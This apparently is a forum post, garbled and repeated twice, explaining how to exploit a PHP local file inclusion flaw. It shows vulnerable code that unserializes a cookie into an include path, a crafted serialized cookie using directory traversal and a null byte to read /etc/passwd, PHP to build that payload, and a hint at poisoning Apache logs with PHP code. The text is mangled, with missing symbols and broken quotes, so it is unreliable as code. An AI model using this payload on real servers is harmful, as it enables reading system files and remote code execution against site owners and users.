<?php
settings=unserialize(_COOKIE[user_settings]);
include("include/lang/".settings[′lang′].".php");?>quiteobvious,youneedtosetacookielikethis:usersettings=a:1:s:4:"lang";s:32:"../../../../../../../etc/passwd[nullchar]";itistheresultof:[codelang=php]<?phpsettings=array();
settings[′lang′]="../../../../../../../etc/passwd/x00";settings=serialize(settings);echosettings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code
settings=unserialize(_COOKIE[user_settings]);
include("include/lang/".settings[′lang′].".php");?>quiteobvious,youneedtosetacookielikethis:usersettings=a:1:s:4:"lang";s:32:"../../../../../../../etc/passwd[nullchar]";itistheresultof:[codelang=php]<?phpsettings=array();
settings[′lang′]="../../../../../../../etc/passwd/x00";settings=serialize(settings);echosettings;
?>
[/code]
the same with apache logs or something...
where you have injected some php code